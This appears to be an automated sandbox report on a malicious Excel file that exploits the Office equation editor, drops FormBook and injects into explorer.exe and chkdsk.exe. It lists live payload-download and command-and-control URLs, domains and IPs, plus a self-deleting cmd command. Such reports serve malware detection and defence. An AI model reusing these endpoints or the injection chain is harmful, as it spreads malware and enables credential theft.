          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 5E0000Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeThread register set: target process: 1244Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 1244Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeProcess created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"Jump to behavior
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
          Source: explorer.exe, 00000008.00000000.412885208.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.849683256.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.412885208.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.849683256.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.412885208.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.849683256.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_004270EB
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: EnumSystemLocalesW,6_2_004273E2
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: EnumSystemLocalesW,6_2_00427397
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: EnumSystemLocalesW,6_2_0042747D
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: GetLocaleInfoW,6_2_0041E421
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00427508
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: GetLocaleInfoW,6_2_0042775B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00427884
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: GetLocaleInfoW,6_2_0042798A
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00427A60
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: EnumSystemLocalesW,6_2_0041DF33
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0040FF08 cpuid 6_2_0040FF08
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0041030B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_0041030B
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_004030FB

          Stealing of Sensitive Information

          barindex
          Yara detected NSISDropper
          Source: Yara matchFile source: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected NSISDropper
          Source: Yara matchFile source: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
          Valid Accounts1
          Scripting          		Path Interception512
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium5
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
          System Shutdown/Reboot          		Acquire InfrastructureGather Victim Identity Information
          Default Accounts1
          Native API          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Scripting          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth1
          Encrypted Channel          		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)Logon Script (Windows)3
          Obfuscated Files or Information          		Security Account Manager127
          System Information Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Data Encrypted for ImpactDNS ServerEmail Addresses
          Local Accounts23
          Exploitation for Client Execution          		Login HookLogin Hook1
          Software Packing          		NTDS141
          Security Software Discovery          		Distributed Component Object ModelInput CaptureTraffic Duplication113
          Application Layer Protocol          		Data DestructionVirtual Private ServerEmployee Names
          Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Rootkit          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
          Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
          External Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
          Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
          Process Injection          		Proc Filesystem1
          Remote System Discovery          		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1342301 Sample: RFQ-T56797W_1.xlsx Startdate: 14/11/2023 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 14 other signatures 2->58 11 EQNEDT32.EXE 11 2->11         started        16 EXCEL.EXE 53 12 2->16         started        process3 dnsIp4 44 mail.treeoflifeadventures.com 41.185.64.155, 49162, 80 GridhostZA South Africa 11->44 40 C:\Users\user\AppData\Roaming\word.exe, PE32 11->40 dropped 42 C:\Users\user\AppData\...\jakatrol2.1[1].exe, PE32 11->42 dropped 78 Office equation editor establishes network connection 11->78 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->80 18 word.exe 17 11->18         started        file5 signatures6 process7 file8 38 C:\Users\user\AppData\...\oktuxvhtsq.exe, PE32 18->38 dropped 21 oktuxvhtsq.exe 18->21         started        process9 signatures10 60 Detected unpacking (changes PE section rights) 21->60 62 Machine Learning detection for dropped file 21->62 64 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 21->64 66 2 other signatures 21->66 24 oktuxvhtsq.exe 21->24         started        process11 signatures12 68 Modifies the context of a thread in another process (thread injection) 24->68 70 Maps a DLL or memory area into another process 24->70 72 Sample uses process hollowing technique 24->72 74 Queues an APC in another process (thread injection) 24->74 27 explorer.exe 8 3 24->27 injected process13 dnsIp14 46 www.narrativepages.com 103.224.212.212, 49164, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 27->46 48 www.miamirealestatecommercial.com 206.188.193.211, 49170, 80 DEFENSE-NETUS United States 27->48 50 10 other IPs or domains 27->50 76 System process connects to network (likely due to code injection or exploit) 27->76 31 chkdsk.exe 27->31         started        34 autochk.exe 27->34         started        signatures15 process16 signatures17 82 Modifies the context of a thread in another process (thread injection) 31->82 84 Maps a DLL or memory area into another process 31->84 86 Tries to detect virtualization through RDTSC time measurements 31->86 36 cmd.exe 31->36         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RFQ-T56797W_1.xlsx63%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
          RFQ-T56797W_1.xlsx55%VirustotalBrowse
          RFQ-T56797W_1.xlsx100%AviraEXP/CVE-2017-11882.Gen

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          centralngs.com14%VirustotalBrowse
          mail.treeoflifeadventures.com18%VirustotalBrowse
          www.miamirealestatecommercial.com12%VirustotalBrowse
          www.narrativepages.com13%VirustotalBrowse
          td-ccm-neg-87-45.wixdns.net0%VirustotalBrowse
          www.sxchenggu.com12%VirustotalBrowse
          www.credit-cards-16215.bond13%VirustotalBrowse
          www.centralngs.com13%VirustotalBrowse
          www.pj69vip12.cyou12%VirustotalBrowse
          www.west-paws.com11%VirustotalBrowse
          www.luxpsy.com11%VirustotalBrowse
          windowsupdatebg.s.llnwi.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.daqtpt.cfd0%Avira URL Cloudsafe
          http://www.moderco.net0%Avira URL Cloudsafe
          http://www.sxchenggu.com/ge06/www.centralngs.com100%Avira URL Cloudmalware
          http://www.miamirealestatecommercial.com/ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41100%Avira URL Cloudmalware
          http://www.centralngs.com100%Avira URL Cloudmalware
          http://www.pj69vip12.cyou/ge06/www.miamirealestatecommercial.com100%Avira URL Cloudmalware
          http://www.bowllywood.com/ge06/www.moderco.net100%Avira URL Cloudmalware
          http://www.versebuild.xyz/ge06/100%Avira URL Cloudphishing
          http://www.centralngs.com13%VirustotalBrowse
          http://www.moderco.net9%VirustotalBrowse
          http://www.daqtpt.cfd6%VirustotalBrowse
          http://www.versebuild.xyz/ge06/1%VirustotalBrowse
          http://www.sxchenggu.com/ge06/100%Avira URL Cloudmalware
          http://www.bulgarianarchive.com/ge06/www.hndswicco.best100%Avira URL Cloudmalware
          http://www.fakeittilyoumakeitfinance.com100%Avira URL Cloudphishing
          http://www.fakeittilyoumakeitfinance.com/ge06/100%Avira URL Cloudmalware
          http://www.fakeittilyoumakeitfinance.comReferer:0%Avira URL Cloudsafe
          http://www.narrativepages.com100%Avira URL Cloudmalware
          http://www.credit-cards-16215.bond100%Avira URL Cloudphishing
          http://www.bowllywood.comReferer:0%Avira URL Cloudsafe
          http://www.bulgarianarchive.comReferer:0%Avira URL Cloudsafe
          http://www.sxchenggu.com/ge06/3%VirustotalBrowse
          http://www.fakeittilyoumakeitfinance.com13%VirustotalBrowse
          http://www.sxchenggu.com100%Avira URL Cloudmalware
          http://www.narrativepages.com13%VirustotalBrowse
          http://www.fakeittilyoumakeitfinance.com/ge06/1%VirustotalBrowse
          http://www.hndswicco.best100%Avira URL Cloudmalware
          http://www.bulgarianarchive.com100%Avira URL Cloudphishing
          http://www.credit-cards-16215.bond13%VirustotalBrowse
          http://www.sxchenggu.com/ge06/?6l58L2=0+Pk4QqMeOZthSuOlE3hLercqAjKj7AZkI6NQZ8fzlVSI648NH9aZsaxoIAU5h7921vkYw==&BL3=KP-PB41100%Avira URL Cloudmalware
          http://www.west-paws.com100%Avira URL Cloudphishing
          http://www.daqtpt.cfd/ge06/100%Avira URL Cloudmalware
          http://www.narrativepages.com/ge06/100%Avira URL Cloudmalware
          http://www.miamirealestatecommercial.com/ge06/www.bowllywood.com100%Avira URL Cloudmalware
          http://www.hndswicco.best11%VirustotalBrowse
          http://mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shel100%Avira URL Cloudmalware
          http://www.pj69vip12.cyou100%Avira URL Cloudphishing
          http://www.west-paws.com/ge06/www.pj69vip12.cyou100%Avira URL Cloudmalware
          http://www.west-paws.com/ge06/100%Avira URL Cloudmalware
          http://www.sxchenggu.com12%VirustotalBrowse
          http://www.credit-cards-16215.bond/ge06/100%Avira URL Cloudmalware
          http://www.miamirealestatecommercial.com100%Avira URL Cloudmalware
          http://www.centralngs.com/ge06/www.west-paws.com100%Avira URL Cloudmalware
          http://www.miamirealestatecommercial.comReferer:0%Avira URL Cloudsafe
          http://www.centralngs.comReferer:0%Avira URL Cloudsafe
          http://www.credit-cards-16215.bondReferer:0%Avira URL Cloudsafe
          http://www.hndswicco.best/ge06/100%Avira URL Cloudmalware
          http://www.west-paws.comReferer:0%Avira URL Cloudsafe
          http://www.west-paws.com/ge06/?6l58L2=0AfOVuqZSJfRN5GiS/+VmpnTwyRml/2OLwKSVYenXKtwNMi61Jg0OdgGHf2AFfl8gIxxQw==&BL3=KP-PB41100%Avira URL Cloudmalware
          http://www.versebuild.xyzReferer:0%Avira URL Cloudsafe
          http://www.bowllywood.com/ge06/100%Avira URL Cloudmalware
          http://www.daqtpt.cfdReferer:0%Avira URL Cloudsafe
          http://www.moderco.net/ge06/100%Avira URL Cloudmalware
          http://www.pj69vip12.cyou/ge06/100%Avira URL Cloudmalware
          http://www.ecoboat.world/ge06/100%Avira URL Cloudmalware
          http://www.ecoboat.worldReferer:0%Avira URL Cloudsafe
          http://www.bulgarianarchive.com/ge06/100%Avira URL Cloudmalware
          http://www.centralngs.com/ge06/100%Avira URL Cloudmalware
          http://www.centralngs.com/ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41100%Avira URL Cloudmalware
          http://www.credit-cards-16215.bond/ge06/www.versebuild.xyz100%Avira URL Cloudmalware
          http://www.sxchenggu.comReferer:0%Avira URL Cloudsafe
          http://www.ecoboat.world/ge06/www.bulgarianarchive.com100%Avira URL Cloudmalware
          http://java.sun.com0%Avira URL Cloudsafe
          http://www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41100%Avira URL Cloudmalware
          http://mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exe100%Avira URL Cloudmalware
          http://www.hndswicco.bestReferer:0%Avira URL Cloudsafe
          http://www.bowllywood.com100%Avira URL Cloudmalware
          http://www.moderco.netReferer:0%Avira URL Cloudsafe
          http://www.narrativepages.comReferer:0%Avira URL Cloudsafe
          http://www.pj69vip12.cyouReferer:0%Avira URL Cloudsafe
          http://www.miamirealestatecommercial.com/ge06/100%Avira URL Cloudmalware
          http://www.moderco.net/ge06/www.daqtpt.cfd100%Avira URL Cloudmalware
          http://www.narrativepages.com/ge06/www.credit-cards-16215.bond100%Avira URL Cloudmalware
          http://www.versebuild.xyz100%Avira URL Cloudmalware
          http://www.daqtpt.cfd/ge06/www.ecoboat.world100%Avira URL Cloudmalware
          http://www.hndswicco.best/ge06/www.fakeittilyoumakeitfinance.com100%Avira URL Cloudmalware
          www.fakeittilyoumakeitfinance.com/ge06/100%Avira URL Cloudmalware
          http://www.ecoboat.world100%Avira URL Cloudphishing

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          centralngs.com
          		3.33.130.190
          		truetrueunknown
          mail.treeoflifeadventures.com
          		41.185.64.155
          		truetrueunknown
          parkingpage.namecheap.com
          		91.195.240.19
          		truefalse
            		high
            www.narrativepages.com
            		103.224.212.212
            		truetrueunknown
            www.miamirealestatecommercial.com
            		206.188.193.211
            		truetrueunknown
            td-ccm-neg-87-45.wixdns.net
            		34.149.87.45
            		truetrueunknown
            www.sxchenggu.com
            		38.11.36.68
            		truetrueunknown
            windowsupdatebg.s.llnwi.net
            		69.164.40.8
            		truefalseunknown
            www.credit-cards-16215.bond
            		unknown
            		unknowntrueunknown
            www.luxpsy.com
            		unknown
            		unknowntrueunknown
            www.centralngs.com
            		unknown
            		unknowntrueunknown
            www.west-paws.com
            		unknown
            		unknowntrueunknown
            www.pj69vip12.cyou
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.miamirealestatecommercial.com/ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41true
            • Avira URL Cloud: malware
            		unknown
            http://www.sxchenggu.com/ge06/?6l58L2=0+Pk4QqMeOZthSuOlE3hLercqAjKj7AZkI6NQZ8fzlVSI648NH9aZsaxoIAU5h7921vkYw==&BL3=KP-PB41true
            • Avira URL Cloud: malware
            		unknown
            http://www.west-paws.com/ge06/?6l58L2=0AfOVuqZSJfRN5GiS/+VmpnTwyRml/2OLwKSVYenXKtwNMi61Jg0OdgGHf2AFfl8gIxxQw==&BL3=KP-PB41true
            • Avira URL Cloud: malware
            		unknown
            http://www.centralngs.com/ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41true
            • Avira URL Cloud: malware
            		unknown
            http://www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41true
            • Avira URL Cloud: malware
            		unknown
            http://mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exetrue
            • Avira URL Cloud: malware
            		unknown
            www.fakeittilyoumakeitfinance.com/ge06/true
            • Avira URL Cloud: malware
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.centralngs.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://www.sxchenggu.com/ge06/www.centralngs.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://www.moderco.netexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
            • 9%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.daqtpt.cfdexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
            • 6%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.pj69vip12.cyou/ge06/www.miamirealestatecommercial.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://www.bowllywood.com/ge06/www.moderco.netexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://www.versebuild.xyz/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: phishing
            		unknown
            http://www.sxchenggu.com/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
            • 3%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://img.sedoparking.comexplorer.exe, 00000008.00000002.851097210.0000000008BFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmpfalse
              		high
              http://www.bulgarianarchive.com/ge06/www.hndswicco.bestexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.fakeittilyoumakeitfinance.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • 13%, Virustotal, Browse
              • Avira URL Cloud: phishing
              		unknown
              http://www.fakeittilyoumakeitfinance.comReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fakeittilyoumakeitfinance.com/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.narrativepages.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • 13%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.credit-cards-16215.bondexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • 13%, Virustotal, Browse
              • Avira URL Cloud: phishing
              		unknown
              http://www.bowllywood.comReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.bulgarianarchive.comReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.sxchenggu.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • 12%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.bulgarianarchive.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              http://www.hndswicco.bestexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • 11%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.west-paws.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              http://www.daqtpt.cfd/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.narrativepages.com/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.miamirealestatecommercial.com/ge06/www.bowllywood.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shelEQNEDT32.EXE, 00000002.00000002.412473279.00000000005DF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.west-paws.com/ge06/www.pj69vip12.cyouexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.autoitscript.com/autoit3explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://www.credit-cards-16215.bond/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.pj69vip12.cyouexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                		unknown
                http://www.west-paws.com/ge06/explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.miamirealestatecommercial.comexplorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.miamirealestatecommercial.comReferer:explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
